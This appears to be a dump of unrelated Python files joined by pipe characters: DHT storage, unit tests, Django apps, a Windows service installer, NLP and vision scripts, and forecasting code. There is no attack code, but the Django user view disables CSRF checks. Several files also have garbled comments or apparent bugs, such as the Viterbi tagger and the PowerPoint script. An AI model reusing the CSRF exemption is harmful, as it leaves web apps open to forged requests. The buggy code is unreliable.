self.republisher.enter(const.discoDhtRepublishTimeout,
1,
self.dhtRepublish,[key,value]) # Re-register for the next cycle.
def addToRepublish(self,key,value):
'''
Add a k/v pair to the republisher
'''
self.logger.info('dhtAddToRepublish[%s]=%r' % (key,value))
with self.republishLock:
event = self.republisher.enter(const.discoDhtRepublishTimeout,
1,
self.dhtRepublish,
[key,value])
self.republishMap[(key,value)] = event
self.republisherStart.set()
def delFromRepublish(self,key,value):
'''
Remove a k/v pair from the republisher.
'''
self.logger.info('dhtDelFromRepublish[%s]=%r' % (key,value))
with self.republishLock:
event = self.republishMap.get((key,value),None)
if event:
self.republisher.cancel(event)
del self.republishMap[(key,value)]
def delFromRepublishAll(self,key,values):
'''
Remove all k/v pair/s from the republisher.
'''
self.logger.info('dhtRemoveFromRepublish[%s]=%r' % (key,str(values)))
with self.republishLock:
for value in values:
event = self.republishMap.get((key,value),None)
if event:
self.republisher.cancel(event)
del self.republishMap[(key,value)]
def insert(self,key:str,value:str) -> [str]:
'''
Insert value under key and return list of clients of value (if any).
A key may have multiple values associated with it.
'''
assert self.dht != None
self.logger.info("dht.insert[%r] := %r" % (key,value))
try:
_values = self.dhtGet(key)
clientsToNotify = []
if value not in _values:
_res = self.dhtPut(key,value)
self.regDb.addKeyValue(key, value) # Save k/v into backup db
self.addToRepublish(key,value) # Add k/v to republisher
clientsToNotify = self.clients.get(key,[]) # Return interested clients
return clientsToNotify
except Exception:
raise DatabaseError("dht.insert: %s" % sys.exc_info()[0])
except OSError:
raise DatabaseError("OS error")
def fetch(self,key:str,client:str) -> [str]:
'''
Fetch value(s) under key.
Retrieve values, remove deleted values from result, add client to list of clients interested in updates
'''
self.logger.info("dht.fetch[%r] -> %r" % (key,client))
try:
self.dhtAddClient(key,client)
values = self.filterDelValues(self.dhtGet(key))
self.logger.info("dht.fetch[%r] = %r" % (key,values))
return values
except Exception:
raise DatabaseError("dht.fetch: %s" % sys.exc_info()[0])
except OSError:
raise DatabaseError("OS error")
def remove(self,key:str,value:str) -> [str]:
'''
Remove value from values under key.
'''
self.logger.info("dht.remove[%r]:%r" % (key,value))
try:
self.delFromRepublish(key,value) # Delete k/v from republisher
self.regDb.delKeyValue(key, value) # Delete k/v from db
values = self.dhtRemove(key,value)
return values
except Exception:
raise DatabaseError("dht.remove: %s" % sys.exc_info()[0])
except OSError:
raise DatabaseError("OS error")
def detach(self, key:str, target:str):
'''
Detach actor (updates) from keys
'''
self.logger.info("dht.detach: %s : %r " % (key,target))
self.dhtDelClient(key,target)
def terminate(self):
self.regDb.closeDbase()
self.republisherStop = True
if self.peerMon: self.peerMon.terminate()
if self.dht:
self.dht.join()
self.dht.shutdown()
|
import unittest
from data_structures.queue.queue import Queue
class TestQueue(unittest.TestCase):
def test_has_more(self):
capacity = 10
q = Queue(capacity=capacity)
self.assertEqual(False, q.has_more())
for i in range(capacity):
q.enqueue(i)
self.assertEqual(True, q.has_more())
for i in range(capacity):
self.assertEqual(True, q.has_more())
q.dequeue()
self.assertEqual(False, q.has_more())
def test_queue_dequeue(self):
capacity = 10
q = Queue(capacity=capacity)
for i in range(capacity):
q.enqueue(i)
for i in range(capacity):
self.assertEqual(i, q.dequeue())
def test_exception(self):
q = Queue(capacity=1)
q.enqueue(1)
self.assertRaises(Exception, q.enqueue, (1, ))
q.dequeue()
self.assertRaises(Exception, q.dequeue)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
# coding=utf-8
# aeneas is a Python/C library and a set of tools
# to automagically synchronize audio and text (aka forced alignment)
#
# Copyright (C) 2012-2013, Alberto Pettarin (www.albertopettarin.it)
# Copyright (C) 2013-2015, ReadBeyond Srl (www.readbeyond.it)
# Copyright (C) 2015-2016, Alberto Pettarin (www.albertopettarin.it)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Run all unit tests for the aeneas package.
"""
from __future__ import absolute_import
from __future__ import print_function
import glob
import os
import sys
import unittest
__author__ = "Alberto Pettarin"
__email__ = "aeneas@readbeyond.it"
__copyright__ = """
Copyright 2012-2013, Alberto Pettarin (www.albertopettarin.it)
Copyright 2013-2015, ReadBeyond Srl (www.readbeyond.it)
Copyright 2015-2016, Alberto Pettarin (www.albertopettarin.it)
"""
__license__ = "GNU AGPL 3"
__status__ = "Production"
__version__ = "1.7.1"
TEST_DIRECTORY = "aeneas/tests"
MAP = {
"fast": ("test_*.py", "test_"),
"bench": ("bench_test_*.py", "bench_test_"),
"long": ("long_test_*.py", "long_test_"),
"net": ("net_test_*.py", "net_test_"),
"tool": ("tool_test_*.py", "tool_test_")
}
class NOPStream(object):
""" NOP stream """
def __init__(self, verbose=False):
self.verbose = verbose
def flush(self):
""" NOP """
pass
def write(self, msg):
""" NOP """
if self.verbose:
print(msg)
def main():
""" Perform tests """
if ("--help" in sys.argv) or ("-h" in sys.argv):
print("")
print("Usage: python %s [--bench-tests|--long-tests|--net-tests|--tool-tests] [--sort] [--verbose]" % sys.argv[0])
print("")
sys.exit(0)
sort_tests = ("--sort" in sys.argv) or ("-s" in sys.argv)
verbose = ("--verbose" in sys.argv) or ("-v" in sys.argv)
if ("--bench-tests" in sys.argv) or ("-b" in sys.argv):
test_type = "bench"
elif ("--long-tests" in sys.argv) or ("-l" in sys.argv):
test_type = "long"
elif ("--net-tests" in sys.argv) or ("-n" in sys.argv):
test_type = "net"
elif ("--tool-tests" in sys.argv) or ("-t" in sys.argv):
test_type = "tool"
else:
test_type = "fast"
pattern, prefix = MAP[test_type]
all_files = [os.path.basename(f) for f in glob.glob(os.path.join(TEST_DIRECTORY, pattern))]
cli_files = [arg for arg in sys.argv[1:] if not arg.startswith("-")]
selected_files = []
for cli_file in cli_files:
if not cli_file.startswith(prefix):
cli_file = prefix + cli_file
if not cli_file.endswith(".py"):
cli_file += ".py"
if cli_file in all_files:
selected_files.append(cli_file)
if len(selected_files) == 0:
selected_files = all_files
if sort_tests:
selected_files = sorted(selected_files)
verbosity = 0
if verbose:
verbosity = 2
results = {}
nop_stream = NOPStream(verbose=verbose)
for test_file in selected_files:
print("Running", test_file, "...")
testsuite = unittest.TestLoader().discover(start_dir=TEST_DIRECTORY, pattern=test_file)
result = unittest.TextTestRunner(stream=nop_stream, verbosity=verbosity).run(testsuite)
results[test_file] = {
"tests": result.testsRun,
"errors": len(result.errors),
"failures": len(result.failures)
}
total_tests = sum([results[k]["tests"] for k in results])
total_errors = sum([results[k]["errors"] for k in results])
total_failures = sum([results[k]["failures"] for k in results])
print("")
print("Tests: ", total_tests)
print("Errors: ", total_errors)
print("Failures: ", total_failures)
if total_errors > 0:
print("")
print("Errors in the following tests:")
print("\n".join([key for key in results.keys() if results[key]["errors"] > 0]))
print("")
if total_failures > 0:
print("")
print("Failures in the following tests:")
print("\n".join([key for key in results.keys() if results[key]["failures"] > 0]))
print("")
print("")
if total_errors + total_failures == 0:
print("[INFO] Tests completed: all passed!")
print("")
sys.exit(0)
else:
print("[INFO] Tests completed: errors or failures found!")
print("")
sys.exit(1)
if __name__ == '__main__':
main()
|
import cv2
he='/home/zrj/Object_detection/hgo3.0/test1.jpg'
he2='/home/zrj/Object_detection/hgo3.0/test2.jpg'
test=cv2.imread(he)
print(test.shape)
test2=cv2.imread(he2)
print(test2.shape)
# cv2.imshow('test',test)
# 166.03738 || 257.6172 || 253.83871 || 378.84848
# 1 label: c score: tensor(0.9989) 795.8562 || 574.78534 || 1089.9589 || 707.62115
# 2 label: c score: tensor(0.9797) 264.5744 || 394.16583 || 486.82922 || 541.3974
# 3 label: c score: tensor(0.9653) 786.41895 || 729.3984 || 980.4159 || 918.14307
# 4 label: c score: tensor(0.8939) 373.24026 || 520.6371 || 610.83594 || 738.6943
img2=cv2.rectangle(test,(795,1089),(574,707),(0,0,255),3)
img3=cv2.rectangle(test2,(795,1089),(574,707),(0,0,255),3)
img2=cv2.rectangle(test,(264,486),(394,541),(0,0,255),3)
img3=cv2.rectangle(test2,(264,486),(394,541),(0,0,255),3)
img2=cv2.rectangle(test,(786,980),(729,918),(0,0,255),3)
img3=cv2.rectangle(test2,(786,980),(729,918),(0,0,255),3)
img2=cv2.rectangle(test,(373,610),(520,738),(0,0,255),3)
img3=cv2.rectangle(test2,(373,610),(520,738),(0,0,255),3)
cv2.imwrite("zrj_test_final1.jpg", img2)
cv2.imwrite("zrj_test_final2.jpg", img3) |
from django.conf.urls import url
from django.contrib import admin
from . import views
urlpatterns = [
url(r'^$', views.home, name='home'),
url(r'^admin/$', views.admin),
url(r'^search/', views.search_parts, name='search'),
url(r'^contact/$', views.contact, name='contact'),
url(r'^new/$', views.new_type, name='new_type'),
url(r'^parts/$', views.view_all, name='view_all'),
url(r'^parts/(.*)/(.*)/edit/$', views.edit_type, name='edit_type'),
url(r'^parts/(.*)/(.*)/remove/$', views.delete_type, name='delete_type'),
url(r'^parts/(.*)/edit/$', views.edit_type, name='edit_type'),
url(r'^parts/(.*)/remove/$', views.delete_type, name='delete_type'),
url(r'^parts/(.*)/$', views.part_detail, name='part_detail'),
url(r'^.*/$', views.no_match)
]
|
from django.db import models
from django.utils import timezone
from datetime import datetime
from searchapp.custom import path_and_rename
from django.dispatch import receiver
from django.db.models.signals import pre_delete, post_save
# Create Models here. Basic ones should be research paper(Paper), (Author), (User)
# Just included a basic template
# (Last edited Sat Nov 29 : dvd)
## Author model
## [TODO] add more attributes
class Author(models.Model):
name = models.CharField(('Name'), max_length=60)
def __unicode__(self):
return self.name
## Category of publication
##
class Category(models.Model):
categoryName = models.CharField(('Name'), max_length=60)
def __unicode__(self):
return self.categoryName
## Sources of publication
class Source(models.Model):
sourceName = models.CharField(('Source'), max_length=60)
def __unicode__(self):
return self.sourceName
## Paper upload field
class PaperUpload(models.Model):
docfile = models.FileField(('Upload File'), upload_to=path_and_rename(), null=True, help_text="Browse a file")
identify = models.CharField(('Title'), default='Uploaded Paper', max_length = 60)
YEAR_CHOICES = []
for r in range(1920, (datetime.now().year+1)):
YEAR_CHOICES.append((r,r))
# timeInsertion = models.DateTimeField(('Added on'), auto_now=True)
publishedYear = models.IntegerField(('year'), choices=YEAR_CHOICES, default=datetime.now().year)
source = models.ForeignKey(Source, max_length=60, blank=True)
def __unicode__(self):
return self.identify
##References
class Reference(models.Model):
description = models.CharField(('References'), max_length=1200)
def __unicode__(self):
return self.description
## Keywords associated with paper
class Keyword(models.Model):
keyword = models.CharField(('Keyword'), max_length=120)
def __unicode__(self):
return self.keyword
##
## Publication model [TODO] add more constraints
## Add upload field for admins
class Paper(models.Model):
title = models.CharField('Title of the paper', max_length=100)
author = models.ManyToManyField(Author, blank=True)
document = models.TextField(blank=True)
source = models.TextField(blank=True, default='ACM Digital Library')
abstract = models.TextField(blank=True)
publishedYear = models.IntegerField(('year'), default=datetime.now().year)
timeInsertion = models.DateTimeField(('Added on'), auto_now=True)
category = models.ManyToManyField(Category, blank=True)
paper_upload = models.ForeignKey(PaperUpload, blank=True, null=True)
references = models.ManyToManyField(Reference, blank=True)
keywords = models.ManyToManyField(Keyword, blank=True)
def __unicode__(self):
return self.title
|
import pathlib
import subprocess
import typer
from mirumon.cli.groups.core import DEFAULT_ATTEMPTS, DEFAULT_DELAY
from mirumon.cli.helpers import create_logs_dir, current_dir
current_path = pathlib.Path().absolute()
NSSM_PATH = current_path / "thirdparty" / "nssm.exe"
SERVICE_NAME = "mirumon"
group = typer.Typer()
@group.command()
def start() -> None:
subprocess.call([NSSM_PATH, "start", SERVICE_NAME])
@group.command()
def install(
server: str,
device_token: str,
reconnect_delay: int = DEFAULT_DELAY,
reconnect_attempts: int = DEFAULT_ATTEMPTS,
allow_shutdown: bool = False,
debug: bool = False,
) -> None:
logs_dir = create_logs_dir()
executable_path = current_dir() / f"{SERVICE_NAME}.exe"
stdout_path = logs_dir / "stdout.log"
stderr_path = logs_dir / "stderr.log"
nssm_commands = nssm_service_setup_commands(
# nssm config
executable_path=executable_path,
stdout_path=stdout_path,
stderr_path=stderr_path,
# client config
server=server,
device_token=device_token,
reconnect_delay=reconnect_delay,
reconnect_attempts=reconnect_attempts,
allow_shutdown=allow_shutdown,
debug=debug,
)
for command in nssm_commands:
subprocess.call(command)
@group.command()
def remove() -> None:
subprocess.call([NSSM_PATH, "remove", SERVICE_NAME, "confirm"])
@group.command()
def stop() -> None:
subprocess.call([NSSM_PATH, "stop", SERVICE_NAME])
@group.command()
def restart() -> None:
subprocess.call([NSSM_PATH, "restart", SERVICE_NAME])
def nssm_service_setup_commands(
*,
executable_path: pathlib.Path,
stdout_path: pathlib.Path,
stderr_path: pathlib.Path,
server: str,
device_token: str,
reconnect_delay: int,
reconnect_attempts: int,
allow_shutdown: bool,
debug: bool,
) -> list:
return [
[NSSM_PATH, "install", SERVICE_NAME, executable_path],
[NSSM_PATH, "set", SERVICE_NAME, "Application", executable_path],
[
NSSM_PATH,
"set",
SERVICE_NAME,
"AppParameters",
"run",
str(server),
str(device_token),
"--reconnect-delay",
str(reconnect_delay),
"--reconnect-attempts",
str(reconnect_attempts),
"--allow-shutdown" if allow_shutdown else "--no-allow-shutdown",
"--debug" if debug else "--no-debug",
],
[NSSM_PATH, "set", SERVICE_NAME, "AppStdout", stdout_path],
[NSSM_PATH, "set", SERVICE_NAME, "AppStderr", stderr_path],
[NSSM_PATH, "set", SERVICE_NAME, "AppExit", "Default", "Restart"],
[NSSM_PATH, "set", SERVICE_NAME, "AppRestartDelay", "0"],
[NSSM_PATH, "set", SERVICE_NAME, "DependOnService", "MpsSvc"],
[NSSM_PATH, "set", SERVICE_NAME, "DependOnService", "winmgmt"],
]
|
#!/usr/bin/env python3
import sys
def main(s):
# Sort the list numerically
nums = [int(x) for x in s]
nums.sort()
print(1 if nums[-1] >= 2 * nums[-2] else -1)
if __name__ == '__main__':
main(sys.argv[1:])
|
def counting_sheep(num):
base=set(['0','1','2','3','4','5','6','7','8','9'])
compare=set()
for i in range(100):
result=str(int(num)*(i+1))
for digit in result:
if digit not in compare:
compare.add(digit)
if compare==base:
return result
else:
return 'INSOMNIA'
if __name__ == "__main__":
fopen=open('test.in')
output=open('output.txt', 'a')
line_num=0
for lines in fopen:
if(line_num==0):
line_num=line_num+1
continue
num=lines.strip()
output.write('Case #'+str(line_num)+': ')
output.write(counting_sheep(num)+'\n')
line_num = line_num + 1
output.close()
|
def get_int_in_range(low,high):
val=int(input())
while val<low or val>high:
print("val is out of range try again")
val= int(input())
return val
def create_list(n,min,max):
result=[]
while n>0:
print("enter integer in the range{}...{}:".format(min,max))
result.append(get_int_in_range(min,max))
n-=1
return result
def main():
lst=create_list(2,10,20)
print(lst)
main()
|
class DBConnectionError(BaseException):
def __init__(self):
self.message = "[ERROR] Connection failed. Try later"
class InvalidSignInParamError(BaseException):
def __init__(self):
self.message = "[ERROR] Wrong mail or password. check it again"
class InvalidPasswordError(BaseException):
def __init__(self):
self.message = "[ERROR] Password must be longer than 6 words"
class NoSuchUserError(BaseException):
def __init__(self):
self.message = "[ERROR] No such user"
class AlreadySignedUpError(BaseException):
def __init__(self):
self.message = "[ERROR] Already Signed up"
class InvalidMailError(BaseException):
def __init__(self):
self.message = "[ERROR] Invalid mail format"
class InvalidUsernameError(BaseException):
def __init__(self):
self.message = "[ERROR] Username must be 6~12 characters"
class NoPostError(BaseException):
def __init__(self):
self.message = "[INFO] There is no post on your wall or feed"
class LogOutException(BaseException):
def __init__(self):
pass
class AlreadyExistUsernameError(BaseException):
def __init__(self):
self.message = "[ERROR] Username already exists"
class AccessDenyError(BaseException):
def __init__(self):
self.message = "[ERROR] You're not allowed to delete this post"
class NoFollowerError(BaseException):
def __init__(self):
self.message = "[INFO] There is no following. Add new friends :)"
|
# -*- coding: utf-8-*-
import datetime
import re
from client.app_utils import getTimezone
from semantic.dates import DateService
from chatterbot import ChatBot
WORDS = ["CHAT"]
def handle(text, mic, profile):
"""
Reports the current time based on the user's timezone.
Arguments:
text -- user-input, typically transcribed speech
mic -- used to interact with the user (for both input and output)
profile -- contains information related to the user (e.g., phone
number)
"""
mic.say("Chatterbot is starting now")
handleForever(mic, profile)
mic.say("Chatterbot is stopping now")
def handleForever(mic, profile):
chatbot = ChatBot()
while True:
exitfromhere = False
input = mic.activeListen()
if input == "exit":
return
mic.say(chatbot.get_response(input))
def isValid(text):
"""
Returns True if input is related to the time.
Arguments:
text -- user-input, typically transcribed speech
"""
return bool(re.search(r'\chat\b', text, re.IGNORECASE))
|
#! /usr/bin/python
__author__="Yue Luo <yl4003@columbia.edu>"
__date__ ="$Feb 16, 2019"
import sys
from collections import defaultdict
import math
from count_freqs import sentence_iterator,simple_conll_corpus_iterator
import numpy as np
import time
"""
Implement the Modified Viterbi Algorithm and runs it on the ner_dev.data.
We import the iterator method from the "count_freqs.py" file.
"""
class counter(object):
"""
The counter stores all the counts for word, tags, trigram and bigram.
"""
def __init__(self, count_file, all_tags):
self.count_file = count_file
self.Count_y_x = defaultdict(int)
self.Count_y = defaultdict(int)
self.Count_trigram = defaultdict(int)
self.Count_bigram = defaultdict(int)
self.all_tags = all_tags
self.trigram = defaultdict(int)
self.frequency_word = defaultdict(int)
def get_counts(self):
"""
Get the counts that will be used to compute the q and e's used in Viterbi
algorithm.
q = Count_trigram/Count_bigram
e = Count_y_x / Count_y
"""
l = count_file.readline()
while l:
line = l.strip()
fields = line.split(" ")
if fields[1] == "WORDTAG":
self.Count_y_x[(fields[2],fields[3])] = int(fields[0])
self.frequency_word[fields[3]] += int(fields[0])
elif fields[1] =="1-GRAM":
self.Count_y[fields[2]] = int(fields[0])
elif fields[1] == "2-GRAM":
self.Count_bigram[(fields[2],fields[3])] = int(fields[0])
elif fields[1] =="3-GRAM":
self.Count_trigram[(fields[2],fields[3],fields[4])] = int(fields[0])
l = count_file.readline()
def get_log_e_x_v(self, word, tag):
"""
Get the log_e(x|v) value give x=word and v=tag.
Value is Count(v->x) / Count(v).
First consider whether this word is _RARE_.
"""
# First need to consider whether this word is _RARE_.
assert tag in self.all_tags # Ensure that this is a value tag.
if word not in self.frequency_word:
word = "_RARE_"
if counter.Count_y_x[(tag,word)] == 0: # This word, tag combination has never appeared.
# print "Tag %s not exist for this word..." % tag
return -9999999999.0
log_pr = math.log(counter.Count_y_x[(tag,word)]) - math.log(counter.Count_y[tag]) # same as log(a/b)
assert log_pr <= 0
return log_pr
def get_log_q_v_w_u(self, tags):
"""
Get the log_q(v|w,u) value give w = w_{i-2}, u=w_{i-1} and v=w_{i}
Tags are in order w, u, v.
Value is Count(w,u,v) / Count(w,u).
"""
if (tags[0],tags[1],tags[2]) in counter.Count_trigram:
count_3 = counter.Count_trigram[(tags[0],tags[1],tags[2])]
else: # Trigram not found in Training set
# print "Trigram [%s,%s,%s] not found" % (tags[0],tags[1],tags[2])
return -9999999999.0
if (tags[0],tags[1]) in counter.Count_bigram:
count_2 = counter.Count_bigram[(tags[0],tags[1])]
else: # Bigram not found in Training set
# print "Bigram [%s,%s] not found" % (tags[0],tags[1])
return -9999999999.0
log_pr = math.log(count_3) - math.log(count_2)
assert log_pr <= 0
return log_pr
def get_trigrams(self, trigram_name):
"""
Directly get the trigram from 5_1.txt. But not use in this work.
"""
try:
trigram_file = file(trigram_name,"r")
except IOError:
sys.stderr.write("ERROR: Cannot read trigramfile %s.\n" % trigram_name)
sys.exit(1)
trigram_file.seek(0)
l = trigram_file.readline()
while l:
line = l.strip()
fields = line.split(" ")
self.trigram[(fields[0],fields[1],fields[2])] = float(fields[3])
l = trigram_file.readline()
def get_log_q_v_w_u_byfile(self, tags):
"""
Getting the q terms from the pre-calculated results. But not use in this work.
"""
if (tags[0],tags[1],tags[2]) in self.trigram:
return self.trigram[(tags[0],tags[1],tags[2])]
else:
return -9999999999.0
def viterbi(sentence, counter):
"""
Calculate the tages of a sentence based on the counts from training data.
Using modified Viterbi Algorithm with log probability.
Output a list of tags with the same size as sentence, and the log prob.
"""
n = len(sentence)
assert n > 0 # Should be a valid sentence.
n_tags = len(counter.all_tags)
tags = []
log_pr = []
dp = np.zeros((n,n_tags,n_tags))
bp = np.zeros((n,n_tags,n_tags))
# Forward Process to get the table
for i in range(n):
if i == 0: # This case only with (*,*,_) trigram.
for j in range(n_tags): # iter all v. w and u are fixed as *. No need for bp[].
v = counter.all_tags[j]
w_u_v = ["*","*",v]
sum = counter.get_log_q_v_w_u(w_u_v) + counter.get_log_e_x_v(sentence[i],v)
dp[0,0,j] = sum
elif i == 1: # This case only with (*,_,_) trigram.
for j in range(n_tags):
for k in range(n_tags):
u = counter.all_tags[j]
v = counter.all_tags[k]
w_u_v = ["*",u,v] # w is always fixed as *. No need for bp[].
sum = dp[0,0,j] + counter.get_log_q_v_w_u(w_u_v) + counter.get_log_e_x_v(sentence[i],v)
dp[i,j,k] = sum
else:
for j in range(n_tags):
for k in range(n_tags):
u = counter.all_tags[j]
v = counter.all_tags[k]
w = counter.all_tags[0]
w_u_v = [w,u,v]
sum = dp[i-1,0,j] + counter.get_log_q_v_w_u(w_u_v) + counter.get_log_e_x_v(sentence[i],v)
max_log_pr = sum # Set to the first one. Otherwise is a bug here.
max_tag = 0
emission = counter.get_log_e_x_v(sentence[i],v) # Reduce time.
for l in range(n_tags):
w = counter.all_tags[l]
w_u_v = [w,u,v] # this should be a triple set now.
sum = dp[i-1,l,j] + counter.get_log_q_v_w_u(w_u_v) + emission
if sum > max_log_pr:
max_log_pr = sum
max_tag = l
dp[i,j,k] = max_log_pr
bp[i,j,k] = max_tag
# Backward process to retrieve the tags.
if n == 1: # Only one word in sequence.
max_tag = 0
max_log_pr = -9999999999.0
for j in range(n_tags):
v = counter.all_tags[j]
w_u_v = ["*",v,"STOP"]
sum = dp[0,0,j] + counter.get_log_q_v_w_u(w_u_v)
if sum > max_log_pr:
max_log_pr = sum
max_tag = j
tags = [counter.all_tags[j]]
log_pr = [max_log_pr]
else: # Get the last two tags first.
max_tag_u = 0
max_tag_v = 0
max_log_pr = -9999999999.0
for j in range(n_tags):
for k in range(n_tags):
u = counter.all_tags[j]
v = counter.all_tags[k]
w_u_v = [u,v,"STOP"]
sum = dp[n-1,j,k] + counter.get_log_q_v_w_u(w_u_v)
if sum > max_log_pr:
max_log_pr = sum
max_tag_u = j
max_tag_v = k
tags.append(counter.all_tags[max_tag_v])
tags.append(counter.all_tags[max_tag_u])
log_pr.append(dp[n-1,max_tag_u,max_tag_v])
# Iterate back and find previous tags.
for i in range(n-3,-1,-1):
tags.append(counter.all_tags[int(bp[i+2,max_tag_u,max_tag_v])])
max_tag_v = max_tag_u
max_tag_u = int(bp[i+2,max_tag_u,max_tag_v])
log_pr.append(dp[i+1,max_tag_u,max_tag_v])
log_pr.append(dp[0,0,max_tag_u])
# Need to reverse the two lists since we store in reversed order.
tags.reverse()
log_pr.reverse()
assert len(tags) == n and len(log_pr) == n
return tags, log_pr
def write_output(counter, input_file, output_name):
"""
Based on the counts and the input file, calculate the most likely tag using
viterbi algorithm, and write the word, the predicted tag and log likelihood
to output_file.
Dev.dat should have 3247 sentences.
"""
output_file = file(output_name, "w")
input_file.seek(0)
start_time = time.time()
sentence_iter = sentence_iterator(simple_conll_corpus_iterator(input_file))
count = 0
for sentence in sentence_iter: # run viterbi for each sentence.
count += 1
s = [x[1] for x in sentence]
tags, log_pr = viterbi(s, counter)
for i in range(len(s)):
l = s[i] + " " + tags[i] + " " + str(log_pr[i]) + "\n"
output_file.write(l)
output_file.write("\n")
output_file.close()
print "Total time: %.4fs...%i sentences" % ((time.time()-start_time),count)
def usage():
print """
python 5_2.py
Read a count_file which already counted all low freq word as _RARE_. And
a input_file with words you want to label with HMM model and Viterbi Algo.
No arguments should be taken.
"""
if __name__ == "__main__":
if len(sys.argv)>=2:
usage()
sys.exit(2)
count_name = "./ner_rare.counts"
input_name = "./ner_dev.dat"
# trigram_name = "./5_1.txt" # Not use it in this work.
try:
count_file = file(count_name,"r")
except IOError:
sys.stderr.write("ERROR: Cannot read countfile %s.\n" % count_name)
sys.exit(1)
try:
input_file = file(input_name,"r")
except IOError:
sys.stderr.write("ERROR: Cannot read inputfile %s.\n" % input_name)
sys.exit(1)
all_tags = ["I-PER","I-ORG","B-ORG","I-LOC","B-LOC","I-MISC","B-MISC","O"]
# Get the counts
counter = counter(count_file, all_tags)
counter.get_counts()
# Run estimator on Dev file and output it.
output_name = "5_2.txt"
write_output(counter, input_file, output_name)
# After that, should use "python eval_ne_tagger.py ner_dev.key 5_2.txt" to check.
|
#-*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
from PIL import Image, ImageDraw
import torch.utils.data as data
import numpy as np
import random
from utils.augmentations import process_rotation_multiscale
def tensor_rot_90(x):
return x.flip(2).transpose(1,2)
def tensor_rot_180(x):
return x.flip(2).flip(1)
def tensor_rot_270(x):
return x.transpose(1,2).flip(2)
class WIDERDetectionRotation(data.Dataset):
def __init__(self, list_file):
super(WIDERDetectionRotation, self).__init__()
self.fnames = []
self.boxes = []
self.labels = []
with open(list_file) as f:
lines = f.readlines()
for line in lines:
line = line.strip().split()
num_faces = int(line[1])
box = []
label = []
for i in range(num_faces):
x = float(line[2 + 5 * i])
y = float(line[3 + 5 * i])
w = float(line[4 + 5 * i])
h = float(line[5 + 5 * i])
c = int(line[6 + 5 * i])
if w <= 0 or h <= 0:
continue
box.append([x, y, x + w, y + h])
label.append(c)
if len(box) > 0:
self.fnames.append(line[0])
self.boxes.append(box)
self.labels.append(label)
self.num_samples = len(self.boxes)
self.size = 256
def __len__(self):
return self.num_samples
def __getitem__(self, index):
while True:
try:
image_path = self.fnames[index]
img = Image.open(image_path)
if img.mode == 'L':
img = img.convert('RGB')
im_width, im_height = img.size
# select a face
target_face = random.choice(self.boxes[index])
left_x = (target_face[0]+target_face[2]) // 2 - self.size // 2 + random.randint(-16,16)
left_y = (target_face[1]+target_face[3]) // 2 - self.size // 2 + random.randint(-16,16)
left_x = np.clip(left_x, 0, im_width-self.size)
left_y = np.clip(left_y, 0, im_height-self.size)
img = img.crop([left_x, left_y, left_x+self.size, left_y+self.size])
label = np.random.randint(4)
if label == 1:
img = img.rotate(90)
elif label == 2:
img = img.rotate(180)
elif label == 3:
img = img.rotate(270)
img = process_rotation_multiscale(img)
break
except Exception as e:
print('Error in WIDERDetectionRotation:', image_path, e)
index = random.randrange(0, self.num_samples)
return torch.from_numpy(img), torch.from_numpy(np.ones([1])*label).long()
def annotransform(self, boxes, im_width, im_height):
boxes[:, 0] /= im_width
boxes[:, 1] /= im_height
boxes[:, 2] /= im_width
boxes[:, 3] /= im_height
return boxes |
import fbprophet
# print version number
print('Prophet %s' % fbprophet.__version__)
import pandas as pd
import numpy as np
from pandas import read_csv, to_datetime
# load data
train_path = '/opt/ml/processing/input/energy-train.csv'
df = read_csv(train_path, header=0)[["Date", "Load"]]
# summarize shape
print(df.shape)
# show first few rows
# prepare expected column names
df.columns = ['ds', 'y']
df['ds'] = to_datetime(df['ds'])
print(df)
# define the model
model = fbprophet.Prophet()
# fit the model
model.fit(df)
# define the period for which we want a prediction
future = list()
for i in range(0, 55, 5):
date = f'2020-12-25 23:{i}:00'
future.append([date])
future = pd.DataFrame(future)
future.columns = ['ds']
future['ds'] = to_datetime(future['ds'])
# use the model to make a forecast
forecast = model.predict(future)
forecast['actual'] = df['y']
# summarize the forecast
print(forecast[['ds', 'yhat', 'yhat_lower', 'yhat_upper', 'actual']])
print(f"loss={np.sum((forecast['yhat'] - forecast['actual'])**2)}")
# plot forecast
import pickle
pkl_path = "/opt/ml/processing/output/model/Prophet.pkl"
with open(pkl_path, "wb") as f:
# Pickle the 'Prophet' model using the highest protocol available.
pickle.dump(model, f)
# save the dataframe
forecast.to_pickle("/opt/ml/processing/output/forecast/forecast.pkl")
print("*** Data Saved ***")
|
import win32com
import win32com.client
def makePPT(path):
ppt = win32com.client.Dispatch("PowerPoint.Appplication")
ppt.Visible = True
#ๅขๅ ไธไธชๆไปถ
pptFile = ppt.Presentations.Add()
#ๅๅปบ้กต
page1 = pptFile.Slides.Add(1,1)
t1 = page1.Shapes[0].TextFrame.TextRange
t1.Text = "tracy"
t2 = page1.Shapes[1].TextFrame.TextRange
t2.Text = "tracy is a good man"
#ๅๅปบ็ฌฌไบ้กต
page2 = pptFile.Slides.Add(1,1)
t1 = page1.Shapes[0].TextFrame.TextRange
t1.Text = "tracy1"
t2 = page1.Shapes[1].TextFrame.TextRange
t2.Text = "tracy1 is a good man"
#ไฟๅญ
pptFile.SaveAs(path)
pptFile.Close()
ppt.Quit()
path = r"G:\python_learn\pycharm_learn\pythonlearn\day011\6ๅppt\a.pptx"
makePPT(path) |
from django.db import models
from django.db.models.base import Model
from django.db.models.fields import EmailField
from django.http.response import JsonResponse
from django.utils.decorators import method_decorator
from django.shortcuts import render
from django.views import View
from django.views.decorators.csrf import csrf_exempt
from .models import User
import json
# Create your views here.
class UserView(View):
@method_decorator(csrf_exempt)
def dispatch(self, request, *args, **kwargs):
return super().dispatch(request, *args, **kwargs)
def get(self, request,id=0):
if(id > 0):
users = list(User.objects.filter(id=id).values())
if len(users) > 0:
user = users[0]
datos = {'message': "Success", 'users': user}
else:
datos = {'message': "User not found..."}
return JsonResponse(datos)
else:
users = list(User.objects.values())
if len(users) > 0:
datos = {'message': "Success", 'users': users}
else:
datos = {'message': "User not found..."}
return JsonResponse(datos)
def post(self, request):
print(request.body)
print(request)
